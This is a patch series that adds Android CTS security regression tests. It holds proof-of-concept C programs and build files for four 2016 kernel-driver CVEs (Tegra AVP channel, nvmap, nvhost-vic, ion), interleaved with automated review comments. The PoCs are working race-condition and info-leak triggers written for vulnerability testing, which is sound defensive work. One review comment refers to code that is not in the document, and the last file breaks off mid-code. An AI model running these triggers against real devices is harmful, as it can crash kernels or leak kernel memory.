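Review bot: The loop in main() that counts `curr_val` down from `0xf1111111` to `-1` depends on signed overflow. The initialiser is already out of range for `int`, and from a negative start the counter can only reach `-1` by wrapping past INT_MIN, which is undefined and may be compiled at -O2 into a loop that never exits. `layer_id` is `unsigned int` in mtkfb.h, so declare `unsigned int curr_val = 0xf1111111u;` and give the loop an explicit bound so the test has a defined run time. `ioctl` is also called with only `<asm-generic/ioctl.h>` included, which supplies the request macros but no prototype unless another header pulls it in; add `#include <sys/ioctl.h>`. `fd` is never closed.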
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
new file mode 100644
index 0000000..ce1e1bb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8449
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
new file mode 100755
index 0000000..1e76b55
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
@@ -0,0 +1,143 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define LOG(fmt, ...)   printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...)   printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM	100
+#define TRY_TIMES		900
+
+#define DEV "/dev/tegra_avpchannel"
+
+#define NVAVP_IOCTL_MAGIC		'n'
+
+struct nvavp_channel_open_args {
+	__u32 channel_fd;
+};
+
+#define NVAVP_IOCTL_CHANNEL_OPEN	_IOR(NVAVP_IOCTL_MAGIC, 0x73, \
+					struct nvavp_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+		ERR("[-] set affinity failed");
+	}
+	return ret;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+	set_affinity(1);
+
+	while(attack){
+		close(target_fd);	
+	}
+
+	return NULL;
+}
+
+int main()
+{
+	int i, try_time = TRY_TIMES, ret;
+	struct nvavp_channel_open_args o_args = { 0 };
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV, O_RDONLY);
+	if(fd == -1){
+		ERR("[-] open failed");
+		return 0;
+	} else {
+		LOG("[+] open OK");
+	}
+
+	#if 1
+	ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+	if(ret == -1) {
+		ERR("[-] ioctl failed");
+		goto out_dev;
+	} else {
+		LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+	}
+
+	target_fd = o_args.channel_fd;	
+	#endif
+
+	/* create close thread */
+	#if 1
+	attack = 1;
+	for(i = 0; i < CLOSE_THREAD_NUM; i++){
+		ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+		if(ret){
+			ERR("[-] create close thread %d failed", i);
+			goto out_close_thread;
+		}
+	}
+	#endif
+
+	#if 1
+	for(i = 0; i < TRY_TIMES; i++){
+		LOG("[+] %03d times", i);
+		/* open */
+		ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+		if(ret == -1) {
+			ERR("[-] ioctl failed");
+		} else {
+			LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+		}
+		//usleep(200);
+	}
+	#endif
+	
+out_close_thread:
+	attack = 0;
+	/* kill close thread */
+	for(i = 0; i < CLOSE_THREAD_NUM; i++){
+		if(close_thread_id[i])
+			pthread_join(close_thread_id[i], NULL);
+	}
+out_dev:
+	close(fd);
+	return 0;
+}
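Review bot: The failure branch after `pthread_create` in main() reports the wrong error. ERR() formats `errno`, but pthread_create returns its error code and does not set errno, so the logged cause can be stale. Log the return value instead: `LOG("[-] create close thread %d failed: %d(%s)", i, ret, strerror(ret));`. Separately, `attack` and `target_fd` are shared with the 100 closing threads through `volatile` only, which gives no ordering guarantee in C; a short comment saying which accesses are meant to race, or C11 atomics for the stop flag, would make the intent explicit. `try_time` is assigned but never used.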
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
new file mode 100644
index 0000000..b9c51d1
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8460
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS := -Wall -W -g -O2 -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
new file mode 100755
index 0000000..78d41e5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+	__u32 handle;		/* nvmap handle */
+	__u32 param;		/* size/align/base/heap etc. */
+	unsigned long result;	/* returns requested info*/
+};
+
+struct nvmap_create_handle {
+	union {
+		__u32 id;	/* FromId */
+		__u32 size;	/* CreateHandle */
+		__s32 fd;	/* DmaBufFd or FromFd */
+	};
+	__u32 handle;		/* returns nvmap handle */
+};
+
+struct nvmap_pin_handle {
+	__u32 *handles;		/* array of handles to pin/unpin */
+	unsigned long *addr;	/* array of addresses to return */
+	__u32 count;		/* number of entries in handles */
+};
+
+struct nvmap_alloc_handle {
+	__u32 handle;		/* nvmap handle */
+	__u32 heap_mask;	/* heaps to allocate from */
+	__u32 flags;		/* wb/wc/uc/iwb etc. */
+	__u32 align;		/* min alignment necessary */
+};
+
+struct nvmap_pin_handle_32 {
+	__u32 handles;		/* array of handles to pin/unpin */
+	__u32 addr;		/*  array of addresses to return */
+	__u32 count;		/* number of entries in handles */
+};
+
+struct nvmap_map_caller_32 {
+	__u32 handle;		/* nvmap handle */
+	__u32 offset;		/* offset into hmem; should be page-aligned */
+	__u32 length;		/* number of bytes to map */
+	__u32 flags;		/* maps as wb/iwb etc. */
+	__u32 addr;		/* user pointer*/
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PIN_MULT      _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle)
+#define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_PIN_MULT_32   _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle_32)
+#define NVMAP_IOC_MMAP_32    _IOWR(NVMAP_IOC_MAGIC, 5, struct nvmap_map_caller_32)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)
+
+
+int g_fd = -1;
+
+int open_driver() {
+    char* dev_path = "/dev/nvmap";
+    g_fd = open(dev_path, O_RDWR);
+    return g_fd;
+}
+
+
+int main(int argc, char**argv) {
+    if (open_driver() < 0) {
+        return -1;
+    }
+    
+    int i;
+    int* handles = mmap((void*)0x20000000, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+    memset(handles, 0x42, 0x1000);
+    for (i = 0; i < 2; ++i) {
+        struct nvmap_create_handle op = {0};
+        op.size = 0x1000;
+        ioctl(g_fd, NVMAP_IOC_CREATE, &op);
+        handles[i] = op.handle;
+        struct nvmap_alloc_handle alloc = {0};
+        alloc.align = 0x1000;
+        alloc.handle = op.handle;
+        alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+        alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+        ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+    }
+
+    void* leak_addr = (void*) 0x10001000;
+    void* mmap_addr = mmap(leak_addr, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+    memset(leak_addr, 0x41, 0x1000);
+
+    unsigned long leaked_data = 0;
+    struct nvmap_pin_handle_32 pin = {0};
+    pin.count = 2;
+    pin.handles = (unsigned int) handles;
+    struct nvmap_pin_handle err_pin = {0};
+    err_pin.count = 0;
+    err_pin.handles = handles;
+    err_pin.addr = leak_addr + 8;
+
+    ioctl(g_fd, NVMAP_IOC_PIN_MULT, &err_pin);  // construct op.addr
+    ioctl(g_fd, NVMAP_IOC_PIN_MULT_32, &pin);
+
+    for (i = 0; i < 10; ++i) {
+        if(((int*)leak_addr)[i] != 0x41414141 && 0 == leaked_data) {
+          leaked_data = (unsigned long)((int*)leak_addr) + i;
+        }
+    }
+
+    if (leaked_data) {
+        printf("Vulnerable");
+    }
+    return 0;
+}
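Review bot: Neither `mmap` call in main() is checked against `MAP_FAILED` before the `memset` that follows, and every `ioctl` return value is discarded. A setup failure therefore either crashes the test or leaves the 0x41 fill untouched, which reads the same as a patched device. Add `if (handles == MAP_FAILED) { perror("mmap"); return -1; }`, and the same check for `mmap_addr`, which is otherwise unused. Return a distinct non-zero status when NVMAP_IOC_CREATE or NVMAP_IOC_ALLOC fails, so the host side can tell "could not run" from "not vulnerable". `g_fd` is never closed, and `printf("Vulnerable")` has no trailing newline, which matters if the host side matches on whole lines.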
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
new file mode 100644
index 0000000..b41fb16
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8482
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
new file mode 100644
index 0000000..41862a5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
@@ -0,0 +1,205 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...)   printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...)   printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+	union {
+		__u32 id;	/* FromId */
+		__u32 size;	/* CreateHandle */
+		__s32 fd;	/* DmaBufFd or FromFd */
+	};
+	__u32 handle;		/* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+#define NVHOST_IOCTL_MAGIC 'H'
+struct nvhost_set_error_notifier {
+	__u64 offset;
+	__u64 size;
+	__u32 mem;
+	__u32 padding;
+};
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER  \
+	_IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+
+struct nvmap_alloc_handle {
+	__u32 handle;		/* nvmap handle */
+	__u32 heap_mask;	/* heaps to allocate from */
+	__u32 flags;		/* wb/wc/uc/iwb etc. */
+	__u32 align;		/* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+		printf("[-] set affinity failed: [%d]-%d\n", errno, errno);
+	}
+	return ret;
+}
+
+struct nvhost_submit_args {
+	__u32 submit_version;
+	__u32 num_syncpt_incrs;
+	__u32 num_cmdbufs;
+	__u32 num_relocs;
+	__u32 num_waitchks;
+	__u32 timeout;
+	__u32 flags;
+	__u32 fence;		/* Return value */
+	__u64 syncpt_incrs;
+	__u64 cmdbuf_exts;
+
+	__u64 pad[3];		/* future expansion */
+
+	__u64 cmdbufs;
+	__u64 relocs;
+	__u64 reloc_shifts;
+	__u64 waitchks;
+	__u64 waitbases;
+	__u64 class_ids;
+	__u64 fences;
+};
+#define NVHOST_IOCTL_CHANNEL_SUBMIT	\
+	_IOWR(NVHOST_IOCTL_MAGIC, 26, struct nvhost_submit_args)
+
+struct nvhost_syncpt_incr {
+	__u32 syncpt_id;
+	__u32 syncpt_incrs;
+};
+
+#define CLOSE_THREAD_NUM	1
+#define TRY_TIMES		2
+#define NVMAPDEV	"/dev/nvmap"
+#define VICDEV		"/dev/nvhost-vic"
+#define SYNC_NUM	1
+struct nvhost_set_error_notifier err1 = { 0 }, err2 = { 0 };
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, vic;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+	int ret;
+	set_affinity(1);
+
+	while(attack){
+		ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &err1);
+	}
+
+	return NULL;
+}
+
+int main()
+{
+	int i, j, ret;
+	int dma1, dma2;
+	struct nvmap_create_handle args = { 
+		.size = PAGE_SIZE
+	};
+	struct nvmap_alloc_handle alloc = {
+		.heap_mask = 0xFFFFFFFF
+	};
+
+	struct nvhost_syncpt_incr incr[SYNC_NUM];
+
+	struct nvhost_submit_args submit = { 
+		.num_syncpt_incrs = SYNC_NUM,
+		.syncpt_incrs = (intptr_t)incr,
+		.timeout = 1,
+		//.class_ids = (intptr_t)&ret
+	};
+
+	memset(incr, 0, sizeof(incr));
+	incr[0].syncpt_id = 6;
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	nvmap = open(NVMAPDEV, O_RDONLY);
+	if(nvmap == -1)
+		ERR("[-] open %s failed", NVMAPDEV);
+	else
+		LOG("[+] open %s OK", NVMAPDEV);
+
+	vic = open(VICDEV, O_RDONLY);
+	if(vic == -1)
+		ERR("[-] open %s failed", VICDEV);
+	else
+		LOG("[+] open %s OK", VICDEV);
+
+	// prepare 
+	ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+	if(ret)
+		ERR("[-] ioctl NVMAP_IOC_CREATE failed");
+	else
+		LOG("[+] NVMAP_IOC_CREATE succeeded, fd = %d", args.handle);
+
+	dma1 = args.handle;
+	err1.mem = dma1;
+	alloc.handle = dma1;
+
+	ret = ioctl(nvmap, NVMAP_IOC_ALLOC, &alloc);
+	if(ret)
+		ERR("[-] ioctl NVMAP_IOC_ALLOC failed");
+	else
+		LOG("[+] NVMAP_IOC_ALLOC succeeded");
+
+	/* create close thread */
+	attack = 1;
+	for(i = 0; i < CLOSE_THREAD_NUM; i++){
+		ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+	}
+	LOG("[+] running...");
+	while(1) {
+		ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SUBMIT, &submit);
+	}
+
+	LOG("[-] passed :(");
+	attack = 0;
+	for(i = 0; i < CLOSE_THREAD_NUM; i++) {
+		pthread_join(close_thread_id[i], NULL);
+	}
+
+	return 0;
+}
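Review bot: Both `open()` failures in `main` are only logged, so on a device without `/dev/nvmap` or `/dev/nvhost-vic` the program goes on to issue ioctls on descriptor -1 and then spins in `while(1)` with no exit condition. Everything after that loop (the `passed` log, `attack = 0`, the `pthread_join` calls) is unreachable, so the binary only ever ends when the host-side timeout kills it. A regression test should stop once setup fails, e.g. `if (nvmap == -1 || vic == -1) return 0;` after the second open, and the loop should have a bound. `intptr_t` is used without a direct `<stdint.h>` include, and `j`, `dma2` and `err2` are never used.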
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
new file mode 100644
index 0000000..95ddb3d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-9120
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
new file mode 100644
index 0000000..c03ee45
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
@@ -0,0 +1,175 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>  
+#include <unistd.h> 
+#include <sched.h>
+
+typedef int ion_user_handle_t;
+
+enum ion_heap_type {
+	ION_HEAP_TYPE_SYSTEM,
+	ION_HEAP_TYPE_SYSTEM_CONTIG,
+	ION_HEAP_TYPE_CARVEOUT,
+	ION_HEAP_TYPE_CHUNK,
+	ION_HEAP_TYPE_DMA,
+	ION_HEAP_TYPE_CUSTOM, /* must be last so device specific heaps always
+				 are at the end of this enum */
+	ION_NUM_HEAPS = 16,
+};
+
+#define ION_HEAP_SYSTEM_MASK		(1 << ION_HEAP_TYPE_SYSTEM)
+#define ION_HEAP_SYSTEM_CONTIG_MASK	(1 << ION_HEAP_TYPE_SYSTEM_CONTIG)
+#define ION_HEAP_CARVEOUT_MASK		(1 << ION_HEAP_TYPE_CARVEOUT)
+#define ION_HEAP_TYPE_DMA_MASK		(1 << ION_HEAP_TYPE_DMA)
+
+#define ION_NUM_HEAP_IDS		sizeof(unsigned int) * 8
+
+struct ion_allocation_data {
+	size_t len;
+	size_t align;
+	unsigned int heap_id_mask;
+	unsigned int flags;
+	ion_user_handle_t handle;
+};
+
+
+struct ion_fd_data {
+	ion_user_handle_t handle;
+	int fd;
+};
+
+
+struct ion_handle_data {
+	ion_user_handle_t handle;
+};
+
+
+struct ion_custom_data {
+	unsigned int cmd;
+	unsigned long arg;
+};
+#define ION_IOC_MAGIC		'I'
+
+#define ION_IOC_ALLOC		_IOWR(ION_IOC_MAGIC, 0, \
+				      struct ion_allocation_data)
+
+#define ION_IOC_FREE		_IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data)
+
+
+#define ION_FLAG_CACHED 1		/* mappings of this buffer should be
+					   cached, ion will do cache
+					   maintenance when the buffer is
+					   mapped for dma */
+#define ION_FLAG_CACHED_NEEDS_SYNC 2	/* mappings of this buffer will created
+					   at mmap time, if this is set
+					   caches must be managed manually */
+                       
+int g_fd = -1;
+struct ion_allocation_data* g_allocation = NULL;
+struct ion_handle_data g_free_data;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+int open_driver() {
+    char* dev_path = "/dev/ion";
+    g_fd = open(dev_path, O_RDONLY);
+    if (g_fd < 0) {
+        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+    } else {
+        printf("[*] open file(%s) succ!\n", dev_path);
+    }
+    return g_fd;
+}
+
+void prepare_data() {
+    void* data = malloc(0x1000);
+    
+    g_allocation = (struct ion_allocation_data*)data;
+    
+    g_allocation->len = 0x1000;
+    g_allocation->align = 8;
+    g_allocation->heap_id_mask = 1 << 25;
+    g_allocation->flags = ION_FLAG_CACHED;
+    g_allocation->handle = -1;
+    
+    mprotect(data, 0x1000, PROT_READ);
+    printf("[*] mprotect, error = %d\n", errno);
+    
+    g_free_data.handle = 1;
+}
+
+void trigger_ion_alloc() {
+    ioctl(g_fd, ION_IOC_ALLOC, g_allocation);
+}
+
